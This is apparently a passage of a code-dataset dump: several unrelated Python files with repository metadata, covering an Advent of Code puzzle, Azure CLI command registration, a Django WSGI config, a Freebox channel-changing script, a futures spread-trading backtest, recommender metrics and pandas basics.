            if nextBlock == len(blocks):
                nextBlock = 0
            blocks[nextBlock] += 1
            banksize -= 1
            nextBlock += 1
        state = tuple(blocks)
        if state in seen:
            break
        seen.add(state)
        iterationcnt += 1
    return iterationcnt
def part2(numbers):
    """Advent of Code 2017 day 6, part 2.

    Same redistribution as part1, but return the length of the cycle: the
    number of redistributions between the two sightings of the repeated
    configuration.
    """
    blocks = list(numbers)
    # Maps configuration -> iteration at which it was first produced.
    # Tuple keys replace the original space-joined strings; they are cheaper
    # and unambiguous. (The original also had a dead 'break' after 'return'.)
    first_seen = {}
    iterationcnt = 1
    while True:
        # Pick the first bank holding the maximum number of blocks.
        nextSplitIdx = blocks.index(max(blocks))
        banksize = blocks[nextSplitIdx]
        blocks[nextSplitIdx] = 0
        nextBlock = nextSplitIdx + 1
        # Deal the blocks out one at a time, wrapping around the end.
        while banksize > 0:
            if nextBlock == len(blocks):
                nextBlock = 0
            blocks[nextBlock] += 1
            banksize -= 1
            nextBlock += 1
        state = tuple(blocks)
        if state in first_seen:
            return iterationcnt - first_seen[state]
        first_seen[state] = iterationcnt
        iterationcnt += 1
if __name__ == "__main__":
data = [int(x) for x in sys.stdin.read().split('\t')]
print part1(data)
print part2(data)
| [
"andreas@froglogic.com"
] | andreas@froglogic.com |
41c2187a7bca2dee9abfa4754403ee086d30d9f3 | 9eb973d9c41708827579b7c4b5b0976fc420d7af | /src/command_modules/azure-cli-resource/azure/cli/command_modules/resource/commands.py | 7eba5e84a7887f1178ec54e3130eebcf7e298b12 | [] | no_license | affini-tech/azureCli | 6e8c2a8a280e11a6a4c9e4cae78eecca8109edcd | 5f0a699f78533723cc302a80d8b68a24f83cc969 | refs/heads/master | 2021-07-07T02:45:52.972867 | 2017-10-03T07:12:40 | 2017-10-03T07:12:40 | 105,291,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,802 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from collections import OrderedDict
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.core.commands import cli_command
from azure.cli.core.commands.arm import \
(cli_generic_update_command, cli_generic_wait_command, handle_long_running_operation_exception,
deployment_validate_table_format)
from azure.cli.core.util import empty_on_404
from azure.cli.command_modules.resource._client_factory import (_resource_client_factory,
cf_resource_groups,
cf_providers,
cf_features,
cf_tags,
cf_deployments,
cf_deployment_operations,
cf_policy_definitions,
cf_resource_links,
cf_resource_managedapplications,
cf_resource_managedappdefinitions)
# Resource group commands
def transform_resource_group_list(result):
    """Table transformer for 'az group list': one Name/Location/Status row
    per resource group dict."""
    rows = []
    for group in result:
        rows.append(OrderedDict([
            ('Name', group['name']),
            ('Location', group['location']),
            ('Status', group['properties']['provisioningState']),
        ]))
    return rows
# 'az group ...' registrations; operation paths are '<module>#<Class.method>'
# strings resolved lazily by the CLI framework.
cli_command(__name__, 'group delete', 'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.delete', cf_resource_groups, no_wait_param='raw', confirmation=True)
cli_generic_wait_command(__name__, 'group wait', 'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.get', cf_resource_groups)
cli_command(__name__, 'group show', 'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.get', cf_resource_groups, exception_handler=empty_on_404)
cli_command(__name__, 'group exists', 'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.check_existence', cf_resource_groups)
cli_command(__name__, 'group list', 'azure.cli.command_modules.resource.custom#list_resource_groups', table_transformer=transform_resource_group_list)
cli_command(__name__, 'group create', 'azure.cli.command_modules.resource.custom#create_resource_group')
cli_command(__name__, 'group export', 'azure.cli.command_modules.resource.custom#export_group_as_template')
# Resource commands
def transform_resource_list(result):
    """Table transformer for 'az resource list': one row per resource with
    Name/ResourceGroup/Location/Type/Status columns. Status falls back to a
    blank when provisioning info is unavailable."""
    transformed = []
    for r in result:
        res = OrderedDict([('Name', r['name']), ('ResourceGroup', r['resourceGroup']), ('Location', r['location']), ('Type', r['type'])])
        try:
            res['Status'] = r['properties']['provisioningStatus']
        except (TypeError, KeyError):
            # properties may be None (TypeError) or a dict without the key
            # (KeyError); the original caught only TypeError and crashed the
            # whole listing on the latter.
            res['Status'] = ' '
        transformed.append(res)
    return transformed
# 'az resource ...' registrations.
cli_command(__name__, 'resource create', 'azure.cli.command_modules.resource.custom#create_resource')
cli_command(__name__, 'resource delete', 'azure.cli.command_modules.resource.custom#delete_resource')
cli_command(__name__, 'resource show', 'azure.cli.command_modules.resource.custom#show_resource', exception_handler=empty_on_404)
cli_command(__name__, 'resource list', 'azure.cli.command_modules.resource.custom#list_resources', table_transformer=transform_resource_list)
cli_command(__name__, 'resource tag', 'azure.cli.command_modules.resource.custom#tag_resource')
cli_command(__name__, 'resource move', 'azure.cli.command_modules.resource.custom#move_resource')
cli_command(__name__, 'resource invoke-action', 'azure.cli.command_modules.resource.custom#invoke_resource_action')

# Resource provider commands
cli_command(__name__, 'provider list', 'azure.mgmt.resource.resources.operations.providers_operations#ProvidersOperations.list', cf_providers)
cli_command(__name__, 'provider show', 'azure.mgmt.resource.resources.operations.providers_operations#ProvidersOperations.get', cf_providers, exception_handler=empty_on_404)
cli_command(__name__, 'provider register', 'azure.cli.command_modules.resource.custom#register_provider')
cli_command(__name__, 'provider unregister', 'azure.cli.command_modules.resource.custom#unregister_provider')
cli_command(__name__, 'provider operation list', 'azure.cli.command_modules.resource.custom#list_provider_operations')
cli_command(__name__, 'provider operation show', 'azure.cli.command_modules.resource.custom#show_provider_operations')

# Feature commands exist only when the active API profile supports them.
if supported_api_version(ResourceType.MGMT_RESOURCE_RESOURCES, min_api='2017-05-10'):
    # Resource feature commands
    cli_command(__name__, 'feature list', 'azure.cli.command_modules.resource.custom#list_features', cf_features)
    cli_command(__name__, 'feature show', 'azure.mgmt.resource.features.operations.features_operations#FeaturesOperations.get', cf_features, exception_handler=empty_on_404)
    cli_command(__name__, 'feature register', 'azure.mgmt.resource.features.operations.features_operations#FeaturesOperations.register', cf_features)

# Tag commands
cli_command(__name__, 'tag list', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.list', cf_tags)
cli_command(__name__, 'tag create', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.create_or_update', cf_tags)
cli_command(__name__, 'tag delete', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.delete', cf_tags)
cli_command(__name__, 'tag add-value', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.create_or_update_value', cf_tags)
cli_command(__name__, 'tag remove-value', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.delete_value', cf_tags)
# Resource group deployment commands
def transform_deployments_list(result):
    """Table transformer for deployment listings: rows sorted by timestamp
    with Name/Timestamp/State columns."""
    ordered = sorted(result, key=lambda deployment: deployment['properties']['timestamp'])
    rows = []
    for deployment in ordered:
        props = deployment['properties']
        rows.append(OrderedDict([
            ('Name', deployment['name']),
            ('Timestamp', props['timestamp']),
            ('State', props['provisioningState']),
        ]))
    return rows
# 'az group deployment ...' registrations.
cli_command(__name__, 'group deployment create', 'azure.cli.command_modules.resource.custom#deploy_arm_template', no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception)
cli_generic_wait_command(__name__, 'group deployment wait', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.get', cf_deployments)
# Newer API profiles renamed the list operation to list_by_resource_group.
if supported_api_version(resource_type=ResourceType.MGMT_RESOURCE_RESOURCES, min_api='2017-05-10'):
    cli_command(__name__, 'group deployment list', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.list_by_resource_group', cf_deployments, table_transformer=transform_deployments_list)
else:
    cli_command(__name__, 'group deployment list', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.list', cf_deployments, table_transformer=transform_deployments_list)
cli_command(__name__, 'group deployment show', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.get', cf_deployments, exception_handler=empty_on_404)
cli_command(__name__, 'group deployment delete', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.delete', cf_deployments)
cli_command(__name__, 'group deployment validate', 'azure.cli.command_modules.resource.custom#validate_arm_template', table_transformer=deployment_validate_table_format)
cli_command(__name__, 'group deployment export', 'azure.cli.command_modules.resource.custom#export_deployment_as_template')

# Resource group deployment operations commands
cli_command(__name__, 'group deployment operation list', 'azure.mgmt.resource.resources.operations.deployment_operations#DeploymentOperations.list', cf_deployment_operations)
cli_command(__name__, 'group deployment operation show', 'azure.cli.command_modules.resource.custom#get_deployment_operations', cf_deployment_operations, exception_handler=empty_on_404)
# Generic update commands: pairs of getter/setter operations used by the
# framework to implement '--set/--add/--remove' style updates.
cli_generic_update_command(__name__, 'resource update',
                           'azure.cli.command_modules.resource.custom#show_resource',
                           'azure.cli.command_modules.resource.custom#update_resource')
cli_generic_update_command(__name__, 'group update',
                           'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.get',
                           'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.create_or_update',
                           lambda: _resource_client_factory().resource_groups)
# 'az policy ...' registrations.
cli_command(__name__, 'policy assignment create', 'azure.cli.command_modules.resource.custom#create_policy_assignment')
cli_command(__name__, 'policy assignment delete', 'azure.cli.command_modules.resource.custom#delete_policy_assignment')
cli_command(__name__, 'policy assignment list', 'azure.cli.command_modules.resource.custom#list_policy_assignment')
cli_command(__name__, 'policy assignment show', 'azure.cli.command_modules.resource.custom#show_policy_assignment', exception_handler=empty_on_404)
cli_command(__name__, 'policy definition create', 'azure.cli.command_modules.resource.custom#create_policy_definition')
cli_command(__name__, 'policy definition delete', 'azure.mgmt.resource.policy.operations#PolicyDefinitionsOperations.delete', cf_policy_definitions)
cli_command(__name__, 'policy definition list', 'azure.mgmt.resource.policy.operations#PolicyDefinitionsOperations.list', cf_policy_definitions)
cli_command(__name__, 'policy definition show', 'azure.cli.command_modules.resource.custom#get_policy_definition', exception_handler=empty_on_404)
cli_command(__name__, 'policy definition update', 'azure.cli.command_modules.resource.custom#update_policy_definition')
# 'az lock ...' registrations.
cli_command(__name__, 'lock create', 'azure.cli.command_modules.resource.custom#create_lock')
cli_command(__name__, 'lock delete', 'azure.cli.command_modules.resource.custom#delete_lock')
cli_command(__name__, 'lock list', 'azure.cli.command_modules.resource.custom#list_locks')
cli_command(__name__, 'lock show', 'azure.cli.command_modules.resource.custom#get_lock', exception_handler=empty_on_404)
cli_command(__name__, 'lock update', 'azure.cli.command_modules.resource.custom#update_lock')
# 'az resource link ...' registrations.
cli_command(__name__, 'resource link create', 'azure.cli.command_modules.resource.custom#create_resource_link')
cli_command(__name__, 'resource link delete', 'azure.mgmt.resource.links.operations#ResourceLinksOperations.delete', cf_resource_links)
cli_command(__name__, 'resource link show', 'azure.mgmt.resource.links.operations#ResourceLinksOperations.get', cf_resource_links, exception_handler=empty_on_404)
cli_command(__name__, 'resource link list', 'azure.cli.command_modules.resource.custom#list_resource_links')
cli_command(__name__, 'resource link update', 'azure.cli.command_modules.resource.custom#update_resource_link')
# Managed-application commands exist only when the API profile supports them.
if supported_api_version(ResourceType.MGMT_RESOURCE_RESOURCES, min_api='2017-05-10'):
    cli_command(__name__, 'managedapp create', 'azure.cli.command_modules.resource.custom#create_application')
    cli_command(__name__, 'managedapp delete', 'azure.mgmt.resource.managedapplications.operations#ApplicationsOperations.delete', cf_resource_managedapplications)
    cli_command(__name__, 'managedapp show', 'azure.cli.command_modules.resource.custom#show_application', exception_handler=empty_on_404)
    cli_command(__name__, 'managedapp list', 'azure.cli.command_modules.resource.custom#list_applications')

    cli_command(__name__, 'managedapp definition create', 'azure.cli.command_modules.resource.custom#create_applicationdefinition')
    cli_command(__name__, 'managedapp definition delete', 'azure.mgmt.resource.managedapplications.operations#ApplicationDefinitionsOperations.delete', cf_resource_managedappdefinitions)
    cli_command(__name__, 'managedapp definition show', 'azure.cli.command_modules.resource.custom#show_applicationdefinition')
    cli_command(__name__, 'managedapp definition list', 'azure.mgmt.resource.managedapplications.operations#ApplicationDefinitionsOperations.list_by_resource_group', cf_resource_managedappdefinitions, exception_handler=empty_on_404)
"lco@affini-tech.com"
] | lco@affini-tech.com |
87f83e0d8d9efa6a1b537f090b0033bac8c5c9f1 | 077d59b7619d10d47b2f9ecbc7050f04a3dba4f1 | /salaryhedge/salaryhedge/salaryhedge/wsgi.py | b834edaf1b94069f48274f7bb2523e4715f9e61a | [
"MIT"
] | permissive | focalpointgit/djangoReactDemo | 04bb383ac6569408bb7dbdcdf8cb1fe123ce16fb | 108cae09f1720179648c4e71192b62856ae6b5f0 | refs/heads/master | 2021-01-02T09:41:37.574732 | 2017-08-06T15:22:29 | 2017-08-06T15:22:29 | 99,280,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | """
WSGI config for salaryhedge project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "salaryhedge.settings")
application = get_wsgi_application()
| [
"droconnel22@gmail.com"
] | droconnel22@gmail.com |
052b1695bde18eec7367c4ce1d83a35f05d7c79f | 92c104f9624be9d4b260724f8c85a71de269b7bf | /ChannelChanger.py | 7a3ca177207d68f27e348d912c90e0de77cb9990 | [] | no_license | avenezia/Freebox-v5-Management | 185b0f00c4f485d1a2bde290e726a5232717b88c | 112e35e88b2234a55062935f9f2cee72d280f775 | refs/heads/master | 2020-05-18T10:59:53.763929 | 2015-10-11T14:57:12 | 2015-10-11T14:57:12 | 25,402,231 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,613 | py | import random
import re
import requests
import time
remoteControlCodeFile = "remoteControlCode"
def AskRemoteControlCode():
isValid = False
code = ""
while not isValid:
code = raw_input("Please provide the code of your remote control (8 digits): ")
isValid = isValidCode(code)
SaveCode(code)
return code
def ChangeChannel(iCode):
basicUrl = "http://hd1.freebox.fr/pub/remote_control?code=" + iCode + "&key="
directions = ["left", "right"]
random.seed()
while True:
time.sleep(10)
index = random.randint(0, 1)
# Change channel and come back to it, to watch (mainly hear) pay-per-view channels in the "mosaïque" of the FreeTv:
# usually you can hear just 10 seconds and then the channel is muted.
requests.get(basicUrl + directions[index])
requests.get(basicUrl + directions[(index + 1) % len(directions)])
def GetRemoteControlCode():
code = ""
try:
fileWithCode = open(remoteControlCodeFile,"r")
code = fileWithCode.read()
if not isValidCode(code):
raise Exception("The remote control code is not valid, please modify or delete " + remoteControlCodeFile + " file.")
except IOError, e:
code = AskRemoteControlCode()
return code
def isValidCode(iCode):
return re.match("^[0-9]{8}$", iCode) is not None
def SaveCode(iCode):
fileWithCode = open(remoteControlCodeFile, "w")
fileWithCode.write(iCode)
fileWithCode.close()
def main():
code = GetRemoteControlCode()
ChangeChannel(code)
if __name__ == '__main__':
main() | [
"alessandro.venezia86@gmail.com"
] | alessandro.venezia86@gmail.com |
cd856b80d6ed4672151d27dbe1db630024af5417 | d71eb59b3890f15e052bb958cfed03b1da5d9e48 | /intercommodityArbitrage/reverseStrategy_v1.py | 89ad14463dcac9eb94c3b811046cf2ab6987d031 | [] | no_license | JasonGuoSkr/futureArbitrage | 1a9696ee5ba00515c496d143adbc663b164d938c | 3f42ceb914bd9628ef875b4c3924737432b4a396 | refs/heads/master | 2023-04-03T06:50:47.613013 | 2021-04-08T05:18:24 | 2021-04-08T05:18:24 | 262,966,400 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,222 | py | # @Time : 2020/6/7 16:28
# @Author : GUO LULU
import os
import datetime
import numpy as np
import pandas as pd
import plotly.graph_objs as go
from plotly.subplots import make_subplots
import intercommodityArbitrage.futureData
import intercommodityArbitrage.spreadAnalysis
import rqdatac as rq
"""
期货跨品种日内交易策略:
短时间(dateLen)内价差(spread_pct)大幅波动,反向建仓
按一定比例止盈或止损/持仓超过一定时间平仓/日内强制平仓
修改内容:
增加**************
"""
def trading_data(underlying_list, start_date, end_date):
date_list = rq.get_trading_dates(start_date=start_date, end_date=end_date)
price_data = pd.DataFrame()
for date_ind in date_list:
print(date_ind)
contract_list = []
for underlying in underlying_list:
contract = rq.futures.get_dominant(underlying, start_date=date_ind, end_date=date_ind, rule=0)
contract_list.append(contract[date_ind])
data_load = intercommodityArbitrage.futureData.future_data_load(contract_list, start_date=date_ind,
end_date=date_ind)
data_df = pd.DataFrame()
data_df['trading_date'] = data_load[contract_list[0]]['trading_date']
columns_list = ['last', 'a1', 'b1']
for contract_id in contract_list:
contract_data = data_load[contract_id][columns_list]
contract_data.columns = [contract_id[:2] + '_' + columns_name for columns_name in columns_list]
data_df = pd.concat([data_df, contract_data], axis=1)
price_data = pd.concat([price_data, data_df], axis=0)
return price_data
def strategy(underlying_list, start_date, end_date, diff=0.0015, stop=-0.001, close=0.001,
open_len=1200, close_len=7200):
# 数据加载
future_data = trading_data(underlying_list, start_date=start_date, end_date=end_date)
spread_data = intercommodityArbitrage.spreadAnalysis.spread_analysis(underlying_list, start_date, end_date)
# 逐tick回测,获取交易信号
trade_details = pd.DataFrame(columns=['tradeDate', 'openTime', 'closeTime', 'tradeDirection',
'openSpread', 'closeSpread', 'profitSpread', 'profitTrade'])
count_num = -1
date_list = rq.get_trading_dates(start_date, end_date)
for date in date_list:
# date = date_list[0]
print(date)
hold_par = False
pos_par = 0
stop_par = stop
close_par = close
open_spread = 0
open_order = 0
daily_spread = spread_data[future_data['trading_date'] == date]
for order in range(1, daily_spread.shape[0] - 1):
# order = open_len
if order < open_len:
data_series = daily_spread.iloc[0:order, 4]
else:
data_series = daily_spread.iloc[order - open_len:order, 4]
last_spread = data_series.iloc[-1]
max_id = np.max(data_series)
min_id = np.min(data_series)
if not hold_par:
if (last_spread - min_id >= diff) and (max_id - last_spread >= diff):
open_spread = last_spread
open_order = order
hold_par = True
count_num += 1
if last_spread - data_series.iloc[0] >= 0:
pos_par = -1
else:
pos_par = 1
trade_details.loc[count_num, 'tradeDate'] = date
trade_details.loc[count_num, 'openTime'] = data_series.index[-1]
trade_details.loc[count_num, 'tradeDirection'] = pos_par
trade_details.loc[count_num, 'openSpread'] = open_spread
elif (last_spread - min_id >= diff) and (max_id - last_spread < diff):
open_spread = last_spread
open_order = order
pos_par = -1
hold_par = True
count_num += 1
trade_details.loc[count_num, 'tradeDate'] = date
trade_details.loc[count_num, 'openTime'] = data_series.index[-1]
trade_details.loc[count_num, 'tradeDirection'] = pos_par
trade_details.loc[count_num, 'openSpread'] = open_spread
elif (last_spread - min_id < diff) and (max_id - last_spread >= diff):
open_spread = last_spread
open_order = order
pos_par = 1
hold_par = True
count_num += 1
trade_details.loc[count_num, 'tradeDate'] = date
trade_details.loc[count_num, 'openTime'] = data_series.index[-1]
trade_details.loc[count_num, 'tradeDirection'] = pos_par
trade_details.loc[count_num, 'openSpread'] = open_spread
else:
profit_spread = last_spread - open_spread
if (profit_spread <= -close_par) and (pos_par == -1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = -profit_spread
pos_par = 0
hold_par = False
if (profit_spread >= -stop_par) and (pos_par == -1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = -profit_spread
pos_par = 0
hold_par = False
if (order - open_order > close_len) and (pos_par == -1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = -profit_spread
pos_par = 0
hold_par = False
if (profit_spread >= close_par) and (pos_par == 1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = profit_spread
pos_par = 0
hold_par = False
if (profit_spread <= stop_par) and (pos_par == 1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = profit_spread
pos_par = 0
hold_par = False
if (order - open_order > close_len) and (pos_par == 1):
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = profit_spread
pos_par = 0
hold_par = False
if pos_par == 1:
data_series = daily_spread.iloc[-open_len:, 4]
last_spread = data_series.iloc[-1]
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = last_spread - open_spread
elif pos_par == -1:
data_series = daily_spread.iloc[-open_len:, 4]
last_spread = data_series.iloc[-1]
trade_details.loc[count_num, 'closeTime'] = data_series.index[-1]
trade_details.loc[count_num, 'closeSpread'] = last_spread
trade_details.loc[count_num, 'profitSpread'] = open_spread - last_spread
# 收益计算
for order in trade_details.index:
# order = trade_details.index[0]
open_time = trade_details.loc[order, 'openTime']
close_time = trade_details.loc[order, 'closeTime']
contract_0 = underlying_list[0]
contract_1 = underlying_list[1]
if trade_details.loc[order, 'tradeDirection'] == 1:
long_leg = (future_data.loc[close_time, contract_0 + '_b1'] -
future_data.loc[open_time, contract_0 + '_a1']) / \
future_data.loc[open_time, contract_0 + '_a1']
short_leg = -(future_data.loc[close_time, contract_1 + '_a1'] -
future_data.loc[open_time, contract_1 + '_b1']) / \
future_data.loc[open_time, contract_1 + '_b1']
else:
long_leg = (future_data.loc[close_time, contract_1 + '_b1'] -
future_data.loc[open_time, contract_1 + '_a1']) / \
future_data.loc[open_time, contract_1 + '_a1']
short_leg = -(future_data.loc[close_time, contract_0 + '_a1'] -
future_data.loc[open_time, contract_0 + '_b1']) / \
future_data.loc[open_time, contract_0 + '_b1']
trade_details.loc[order, 'profitTrade'] = (long_leg + short_leg) / 2
# trade_details['profitTrade'].mean()
return trade_details
if __name__ == '__main__':
rq.init("ricequant", "8ricequant8", ('10.29.135.119', 16010))
# 参数 回测区间及合约代码
startDate = '20200101'
endDate = '20200531'
underlyingList = ('IF', 'IH')
diffPar = 0.004
stopPar = -0.0025
closePar = 0.005
openLen = 1800
closeLen = 7200
underlying_list = underlyingList
start_date = startDate
end_date = endDate
tradeDetails = strategy(underlyingList, startDate, endDate, diff=diffPar,
stop=stopPar, close=closePar, open_len=openLen, close_len=closeLen)
tradeDetails = tradeDetails[tradeDetails['tradeDate'] != datetime.date(2020, 2, 3)]
tradeDetails['profitTrade'].mean()
| [
"gl18253166772@163.com"
] | gl18253166772@163.com |
8b51c987b63b3177ed110cb9eba833dc3e9b1891 | c1cd6a7a446934c428bc4fbf988f8d6680460488 | /dist/restclient.app/Contents/Resources/py2app/bootstrap/path_inject.py | ace081845b5061c6e400919901db030b61234c9f | [] | no_license | devvmh/restclient-py2app | ed016d1763ee99779388c8700dfb9c129cf8ce1a | 6826f6cb81c08a36b30878683a58e4f7a18f5041 | refs/heads/master | 2021-01-10T12:01:31.411373 | 2016-01-18T03:34:02 | 2016-01-18T03:34:02 | 49,850,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | /Users/devin/git/restclient/venv/lib/python2.7/site-packages/py2app/bootstrap/path_inject.py | [
"devin@callysto.com"
] | devin@callysto.com |
9bbd1824156c6c3fbddd4d501507406d7e4363ca | 34179547b19e84de36658edc3bc1d467ea9def22 | /2018/Evaluator.py | 6ebdd31f78eb0feb444335fe4235dcf0300168de | [] | no_license | MathyasGiudici/polimi-recsys-challenge | a7ca211a0d76a8ac900ad36051854a268bc8d944 | 7ec8b5913d51772bb79fbff932fba73c806f1121 | refs/heads/master | 2022-04-18T20:41:28.739208 | 2020-01-13T19:32:07 | 2020-01-13T19:32:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,804 | py | import numpy as np
def precision(recommended_items, relevant_items):
is_relevant = np.in1d(recommended_items, relevant_items, assume_unique=True)
precision_score = np.sum(is_relevant, dtype=np.float32) / len(is_relevant)
return precision_score
def recall(recommended_items, relevant_items):
is_relevant = np.in1d(recommended_items, relevant_items, assume_unique=True)
recall_score = np.sum(is_relevant, dtype=np.float32) / relevant_items.shape[0]
return recall_score
def MAP(recommended_items, relevant_items):
is_relevant = np.in1d(recommended_items, relevant_items, assume_unique=True)
# Cumulative sum: precision at 1, at 2, at 3 ...
p_at_k = is_relevant * np.cumsum(is_relevant, dtype=np.float32) / (1 + np.arange(is_relevant.shape[0]))
map_score = np.sum(p_at_k) / np.min([relevant_items.shape[0], is_relevant.shape[0]])
return map_score
def evaluate_algorithm(URM_test, recommender_object, userList_unique, at=10):
cumulative_precision = 0.0
cumulative_recall = 0.0
cumulative_MAP = 0.0
num_eval = 0
for user_id in userList_unique:
relevant_items = URM_test[user_id].indices
if len(relevant_items) > 0:
recommended_items = recommender_object.recommend(user_id, at=at)
num_eval += 1
cumulative_precision += precision(recommended_items, relevant_items)
cumulative_recall += recall(recommended_items, relevant_items)
cumulative_MAP += MAP(recommended_items, relevant_items)
cumulative_precision /= num_eval
cumulative_recall /= num_eval
cumulative_MAP /= num_eval
print("Recommender performance is: Precision = {:.4f}, Recall = {:.4f}, MAP = {:.4f}".format(
cumulative_precision, cumulative_recall, cumulative_MAP))
| [
"mathyas.giudici@mail.polimi.it"
] | mathyas.giudici@mail.polimi.it |
ed4509fd979a91930169ae8f72c2fecda12f5bb8 | 187ea97ac522e70a7c3c7c1f0d85a1f98a347f3b | /config.py | 32b5b1180419be78b0c8e28fdf1f16eaafb2b0dc | [] | no_license | RomanRusyn/gRPC_weather | 538a01146a3e01cb58baaf4840c68c362572f222 | 3a2accb4033111c3861196fa8f09f4db192c4ff8 | refs/heads/master | 2023-07-14T13:41:51.109402 | 2021-08-26T09:22:24 | 2021-08-26T09:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | import logging
from confluent_kafka import Consumer
log = logging.basicConfig(filename='consumer_results.log', filemode='w',
datefmt='%d-%b-%y %H:%M:%S',
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s '
'- %(message)s')
consumer = Consumer({
'bootstrap.servers': 'localhost:29092',
'group.id': 'mygroup',
'auto.offset.reset': 'earliest'
})
port_grpc = '[::]:50051'
| [
"romanR@ss"
] | romanR@ss |
bcc17cde14b9b19e6d3ad5157dd1b1d909f06dc6 | 87434c060cc23d82e527c0e2f1f972c29e30a0bf | /main/experiments_urls.py | ee187656a35ba90e7f8bad1cc167a5b26d7cce7d | [] | no_license | NSchroeder97/HSB-PHYSIK | 2581f95cee8a82cdf031d4578507bb5c3dc86988 | a4d3c7cea2f6dc9271a5f15f335b72115b00d51a | refs/heads/main | 2023-05-26T15:48:18.974023 | 2021-05-12T12:11:01 | 2021-05-12T12:11:01 | 371,008,727 | 0 | 0 | null | 2021-05-26T11:25:22 | 2021-05-26T11:25:22 | null | UTF-8 | Python | false | false | 697 | py | from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from . import experiments
# Doppelspalt
def doppelspalt(response):
return render(response, 'main/experiments/doppelspalt/index.html')
# Return the data
def doppelspalt_api(response, lam, b, d, angle):
data = experiments.doppelspalt.doppel_data(lam, b, d, angle)
return JsonResponse(data, safe=False)
def laser_emissions(response):
return render(response, 'main/experiments/laser_emissions/index.html')
def laser_emissions_api(response, n_atoms, n_photons, niveau):
data = experiments.laser_emissions.level_emissions(n_atoms, n_photons, niveau)
return JsonResponse(data, safe=False) | [
"mail@lars-jelschen.de"
] | mail@lars-jelschen.de |
3e612434ec8be084c6f74e3e8af5bfb81ced3033 | 20d03615ecb5282fb10dca75dd11469db5d02065 | /prq.py | 1d2d798324bcd01961bb07cf4ba6e4538cf39d23 | [] | no_license | laharikaneelam/Python_exercises | 227f2d3c51b652991c77f1e9a947b435376ba9bf | 0fcd396a465294c94a20272367799e395cdde954 | refs/heads/main | 2023-01-24T08:42:46.409130 | 2020-11-26T14:39:35 | 2020-11-26T14:39:35 | 314,806,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | def prt(aswrd):
sch=aswrd.strip()
sch=aswrd.upper()
print(f"{aswrd}")
prt("print")
| [
"noreply@github.com"
] | noreply@github.com |
1f72205dad514935455fd3be194807f4ebba7730 | 7a10bf8748c7ce9c24c5461c21b5ebf420f18109 | /ml_training/PythonCode/P4_Pandas_Basics.py | 76770dbb25d18994fa84bd5163e320d499c538b4 | [] | no_license | VishalChak/machine_learning | aced4b4bf65bbbd08c966a2f028f217a918186d5 | c6e29abe0509a43713f35ebf53da29cd1f0314c1 | refs/heads/master | 2021-06-15T07:13:56.583097 | 2019-10-05T06:01:58 | 2019-10-05T06:01:58 | 133,164,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,051 | py |
# Import Library
import pandas as pd
# Read data from a url
url = "https://vincentarelbundock.github.io/Rdatasets/csv/datasets/HairEyeColor.csv"
df = pd.read_csv(url)
# Type of the df object
type(df)
# Column names
list(df)
# Show first few rows
df.head()
# Show last few rows
df.tail()
# Data type of each column
df.dtypes
# Return number of columns and rows of dataframe
df.shape
# Number of rows
len(df.index)
# Number of columns
len(df.columns)
# Basic statistics
df.describe()
# Extract first three rows
df[0:3]
# or
#df.iloc[:3]
# Filter for black hair
#df[df['Hair']=="Black"]
# or
df.query("Hair =='Black'")
# Filter for males who have black hair
